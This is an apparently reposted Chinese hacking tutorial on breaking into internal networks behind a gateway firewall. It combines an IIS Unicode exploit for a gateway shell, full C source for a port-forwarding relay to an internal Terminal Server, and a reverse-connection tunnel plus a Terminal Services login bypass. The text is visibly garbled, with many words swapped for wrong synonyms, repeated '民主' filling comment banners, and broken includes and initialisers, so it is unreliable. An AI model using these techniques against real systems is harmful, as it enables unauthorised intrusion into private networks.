如何突破TCP-IP过滤防火墙进入内网

  现在很多企业或者公司根本上彀方式根本上都是请求一条连接到Internet的线路，宽带、DDN、ADSL、ISDN等等，然后用一台服务器做网关，服务器两块网卡，一块是连接到Internet，另一块是连接到内网的HUB或者交换机,然后内网的其他呆板就可以经过网干系接到Internet。
  也许有些人会如许想，我在内网之中，我们之间没有直接的连接，你没有办法攻击我。究竟并非云云，在内网的呆板同样可能蒙受到来自Internet的攻击，固然条件是攻击者曾经获得网关服务器的某些权限，呵呵，这是不是空话？其实，Internet上很多做网关的服务器并未经过严格的安全设置装备摆设，要获取权限也不是想象中的那么难。
  Ok!空话就不说了，切入正题。我们的目标是用我们的TermClient[M$终端服务客户端]连接到仇人内网的TermServer呆板。M$的终端服务是一个很好的远程办理东西，不是吗？呵呵。没有做特别说明的话，文中提到的服务器OS都为windows
  2000。服务器为Linux或其他的话，原理也差未几，把程序稍微修正就行了。
  <<第一部分：利用TCP socket数据转发进入没有防火墙保护的内网>>
  假定仇人网络拓扑如下图所示，没有安装防火墙或在网关服务器上做TCP/IP限制。
  我们的目标是连接上仇人内网的Terminal
  Server[192.168.1.3]，因为没有办法直接和他创建连接，那么只要先从它的网关服务器上动手了。倘使仇人网关服务器是M$的windows
  2k，IIS有Unicode毛病[现在要找些有毛病的呆板太容易了，但我只是scripts
  kid，只会利用现成的毛病做些简单的攻击：（555），那么我们就得到一个网关的shell了，我们可以在那上面运行我们的程序，固然权限很低，但也可以做很多事变了。Ok!让我们来写一个做TCP
  socket数据转发的小程序，让仇人的网关服务器忠实的为我[202.1.1.1]和仇人内网的TermServer[192.168.1.3]之间转发数据。题外话：现实入侵历程是先获得网关服务器的权限，然后用他做跳板，进一步摸清它的外部网络拓扑结构，再做进一步的入侵，现在仇人的网络拓扑是我们给他计划的，哈哈。
  攻击流程如下：
  <1>在网关服务器202.2.2.2运行我们的程序AgentGateWay，他监听TCP
  3389端口[改成别的，那我们就要相应的修正TermClient了]等候我们去连接。
  <2>我们202.1.1.1用TermClient连接到202.2.2.2:3389。
  <3>202.2.2.2.担当202.1.1.1的连接，然后再创建一个TCP
  socket连接到本身内网的TermServer[192.168.1.3]
  <4>如许我们和仇人内网的TermServer之间的数据通道就建好了，接上去网关就忠实的为我们转发数据啦。当我们连接到202.2.2.2:3389的时间，其实出来的界面是仇人内网的192.168.1.3，觉得怎样样？：）
  程序代码如下：
  /民主民主民主民主民主民主民主民主民主民主民主民主民主民主民主民主民主**
  Module Name:AgentGateWay.c
  Date:2001/4/15
  CopyRight(c) eyas
  说明：端口重定向东西，在网关上运行，把端口重定向到内网的IP、PORT，
  就可以进入内网了
  sock[0]==>sClient sock[1]==>sTarget
  民主民主民主民主民主民主民主民主民主民主民主民主民主民主民主民主民主**/
  #include
  #include
  #include "TCPDataRedird.c"
  #define TargetIP TEXT("192.168.1.3")
  #define TargetPort (int)3389
  #define ListenPort (int)3389//监听端口
  #pragma comment(lib,"ws2_32.lib")
  int main()
  {
  WSADATA wsd;
  SOCKET sListen=INVALID_SOCKET,//本机监听的socket
  sock[2];
  struct sockaddr_in Local,Client,Target;
  int iAddrSize;
  HANDLE hThreadC2T=NULL,//C2T=ClientToTarget
  hThreadT2C=NULL;//T2C=TargetToClient
  DWORD dwThreadID;
  __try
  {
  if(WSAStartup(MAKEWORD(2,2),&wsd)!=0)
  {
  printf(" WSAStartup() failed:%d",GetLastError());
  __leave;
  }
  sListen=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
  if(sListen==INVALID_SOCKET)
  {
  printf(" socket() failed:%d",GetLastError());
  __leave;
  }
  Local.sin_addr.s_addr=htonl(INADDR_ANY);
  Local.sin_family=AF_INET;
  Local.sin_port=htons(ListenPort);
  Target.sin_family=AF_INET;
  Target.sin_addr.s_addr=inet_addr(TargetIP);
  Target.sin_port=htons(TargetPort);
  if(bind(sListen,(struct sockaddr
  *)&Local,sizeof(Local))==SOCKET_ERROR)
  {
  printf(" bind() failed:%d",GetLastError());
  __leave;
  }
  if(listen(sListen,1)==SOCKET_ERROR)
  {
  printf(" listen() failed:%d",GetLastError());
  __leave;
  }
  //scoket循环
  while(1)
  {
  printf(" 民主民主民主*Waiting Client Connect
  to民主民主民主** ");
  iAddrSize=sizeof(Client);
  //get socket sClient
  sock[0]=accept(sListen,(struct sockaddr *)&Client,&iAddrSize);
  if(sock[0]==INVALID_SOCKET)
  {
  printf(" accept() failed:%d",GetLastError());
  break;
  }
  printf(" Accept client==>%s:%d",inet_ntoa(Client.sin_addr),
  ntohs(Client.sin_port));
  //create socket sTarget
  sock[1]=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
  if(sock[1]==INVALID_SOCKET)
  {
  printf(" socket() failed:%d",GetLastError());
  __leave;
  }
  //connect to target port
  if(connect(sock[1],(struct sockaddr
  *)&Target,sizeof(Target))==SOCKET_ERROR)
  {
  printf(" connect() failed:%d",GetLastError());
  __leave;
  }
  printf(" connect to target 3389 success!");
  //创建两个线程进行数据转发
  hThreadC2T=CreateThread(NULL,0,TCPDataC2T,(LPVOID)sock,0,&dwThreadID);
  hThreadT2C=CreateThread(NULL,0,TCPDataT2C,(LPVOID)sock,0,&dwThreadID);
  //等候两个线程结束
  WaitForSingleObject(hThreadC2T,INFINITE);
  WaitForSingleObject(hThreadT2C,INFINITE);
  CloseHandle(hThreadC2T);
  CloseHandle(hThreadT2C);
  closesocket(sock[1]);
  closesocket(sock[0]);
  printf(" 民主民主民主民主*Connection
  Close民主民主民主民主*** ");
  }//end of sock外循环
  }//end of try
  __finally
  {
  if(sListen!=INVALID_SOCKET) closesocket(sListen);
  if(sock[0]!=INVALID_SOCKET) closesocket(sock[0]);
  if(sock[1]!=INVALID_SOCKET) closesocket(sock[1]);
  if(hThreadC2T!=NULL) CloseHandle(hThreadC2T);
  if(hThreadT2C!=NULL) CloseHandle(hThreadT2C);
  WSACleanup();
  }
  return 0;
  }
  /民主民主民主民主民主民主民主民主民主民主民主民主民主民主民主民主民主民主*
  Module:TCPDataRedird.c
  Date:2001/4/16
  CopyRight(c) eyas
  HomePage:www.patching.net
  Thanks to shotgun
  说明:TCP socket数据转发,sock[0]==>sClient sock[1]==>sTarget
  民主民主民主民主民主民主民主民主民主民主民主民主民主民主民主民主民主民主*/
  #define BuffSize 20*1024 //缓冲区大小20k
  //此函数负责从Client读取数据，然后转发给Target
  DWORD WINAPI TCPDataC2T(SOCKET* sock)
  {
  int iRet,
  ret=-1,//select 前往值
  iLeft,
  idx,
  iSTTBCS=0;//STTBCS=SendToTargetBuffCurrentSize
  char szSendToTargetBuff[BuffSize]=,
  szRecvFromClientBuff[BuffSize]=;
  fd_set fdread,fdwrite;
  printf(" 民主民主民主民主*Connection
  Active民主民主民主民主*** ");
  while(1)
  {
  FD_ZERO(&fdread);
  FD_ZERO(&fdwrite);
  FD_SET(sock[0],&fdread);
  FD_SET(sock[1],&fdwrite);
  if((ret=select(0,&fdread,&fdwrite,NULL,NULL))==SOCKET_ERROR)
  {
  printf(" select() failed:%d",GetLastError());
  break;
  }
  //printf(" select() return value ret=%d",ret);
  if(ret>0)
  {
  //sClinet可读，client有数据要发送过去
  if(FD_ISSET(sock[0],&fdread))
  {
  //吸收sock[0]发送来的数据
  iRet=recv(sock[0],szRecvFromClientBuff,BuffSize,0);
  if(iRet==SOCKET_ERROR)
  {
  printf(" recv() from sock[0] failed:%d",GetLastError());
  break;
  }
  else if(iRet==0)
  break;
  printf(" recv %d bytes from sClinet.",iRet);
  //把从client吸收到的数据存添加到发往target的缓冲区
  memcpy(szSendToTargetBuff+iSTTBCS,szRecvFromClientBuff,iRet);
  //刷新发往target的数据缓冲区当前buff大小
  iSTTBCS+=iRet;
  //清空吸收client数据的缓冲区
  memset(szRecvFromClientBuff,0,BuffSize);
  }
  //sTarget可写，把从client吸收到的数据发送到target
  if(FD_ISSET(sock[1],&fdwrite))
  {
  //转发数据到target的3389端口
  iLeft=iSTTBCS;
  idx=0;
  while(iLeft>0)
  {
  iRet=send(sock[1],&szSendToTargetBuff[idx],iLeft,0);
  if(iRet==SOCKET_ERROR)
  {
  printf(" send() to target failed:%d",GetLastError());
  break;
  }
  printf(" send %d bytes to target",iRet);
  iLeft-=iRet;
  idx+=iRet;
  }
  //清空缓冲区
  memset(szSendToTargetBuff,0,BuffSize);
  //重置发往target的数据缓冲区当前buff大小
  iSTTBCS=0;
  }
  }//end of select ret
  Sleep(1);
  }//end of data send & recv循环
  return 0;
  }
  //此函数负责从target读取数据，然后发送给client
  DWORD WINAPI TCPDataT2C(SOCKET* sock)
  {
  int iRet,
  ret=-1,//select 前往值
  iLeft,
  idx,
  iSTCBCS=0;//STCBCS=SendToClientBuffCurrentSize
  char szRecvFromTargetBuff[BuffSize]=,
  szSendToClientBuff[BuffSize]=;
  fd_set fdread,fdwrite;
  while(1)
  {
  FD_ZERO(&fdread);
  FD_ZERO(&fdwrite);
  FD_SET(sock[0],&fdwrite);
  FD_SET(sock[1],&fdread);
  if((ret=select(0,&fdread,&fdwrite,NULL,NULL))==SOCKET_ERROR)
  {
  printf(" select() failed:%d",GetLastError());
  break;
  }
  if(ret>0)
  {
  //sTarget可读，从target吸收数据
  if(FD_ISSET(sock[1],&fdread))
  {
  //吸收target前往数据
  iRet=recv(sock[1],szRecvFromTargetBuff,BuffSize,0);
  if(iRet==SOCKET_ERROR)
  {
  printf(" recv() from target failed:%d",GetLastError());
  break;
  }
  else if(iRet==0)
  break;
  printf(" recv %d bytes from target",iRet);
  //把从target吸收到的数据添加到发送到client的缓冲区
  memcpy(szSendToClientBuff+iSTCBCS,szRecvFromTargetBuff,iRet);
  //清空吸收target前往数据缓冲区
  memset(szRecvFromTargetBuff,0,BuffSize);
  //刷新发送到client的数据缓冲区当前大小
  iSTCBCS+=iRet;
  }
  //client可写，发送target前往数据到client
  if(FD_ISSET(sock[0],&fdwrite))
  {
  //发送target前往数据到client
  iLeft=iSTCBCS;
  idx=0;
  while(iLeft>0)
  {
  iRet=send(sock[0],&szSendToClientBuff[idx],iLeft,0);
  if(iRet==SOCKET_ERROR)
  {
  printf(" send() to Client failed:%d",GetLastError());
  break;
  }
  printf(" send %d bytes to Client",iRet);
  iLeft-=iRet;
  idx+=iRet;
  }
  //清空缓冲区
  memset(szSendToClientBuff,0,BuffSize);
  iSTCBCS=0;
  }
  }//end of select ret
  Sleep(1);
  }//end of while
  return 0;
  }
  (利用TCP socket转发和反弹TCP端口进入有防火墙保护的内网)
  究竟上很多内网没有第一部分所说的那么简单啦，我们来看一个有防火墙保护的内网,条件是这个防火墙对反弹TCP端口不做限制，限制了的话，又另当别论了。假定网络拓扑如下：
  上面的网络拓扑是我在一次对朋友公司网站授权入侵历程中遇到的。
  〈1〉我本身处于公司内网192.168.0.2，经过公司网关202.1.1.1到Internet，但我是网关的admin：）。
  〈2〉仇人[其实是friend啦]的网关OS是2k adv
  server，在外网网卡上做了TCP/IP限制，只开放了25,53,80,110,3306这几个TCP
  PORT，经过一个毛病，我得到了一个shell，可以经过IE来执行系统命令，固然权限很低。网关有终端服务，登陆验证毛病补丁未安装，但输出法资助文件曾经被删除了，但是我们可以经过shell把输出法资助文件upload上去，因为他的系统权限没有设置好，我们可以写，呵呵。如许的话，我们只要能够连接到他的终端服务上去，我们就能绕过登陆验证，得到admin权限了。如何连接？有办法，用TCP
  socket转发。和第一部辩白的一样吗？有些差别。因为他做了TCP/IP限制，我们不克不及连接他，只能让他来连接我们了，TCP反弹端口，呵呵。
  攻击流程如下：
  〈1〉在我的服务器202.1.1.1运行AgentMaster，监听TCP PORT
  12345，等候202.2.2.2来连接，监听TCP PORT 3389，等候我192.168.0.2连接。
  〈2〉在仇人网关呆板202.2.2.2运行AgentSlave，连接到202.1.1.1 TCP PORT
  12345[注意：是反弹端口，TCP/IP过滤也拿他没办法]
  〈3〉我本身192.168.0.2用TermClient连接到本身的服务器202.1.1.1:3389
  〈4〉仇人网关上的AgentSlave连接到本身本身在内网的IP==〉192.168.1.1:3389
  〈5〉数据通道就创建好啦。两个署理忠实的为我们转发数据，呵呵。当我们连接本身服务器的3389，其实出来的是仇人内网的某台呆板，呵呵。 

文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明：原创作品，允许转载，转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

评论加载中... 内容： 评论者： 验证码：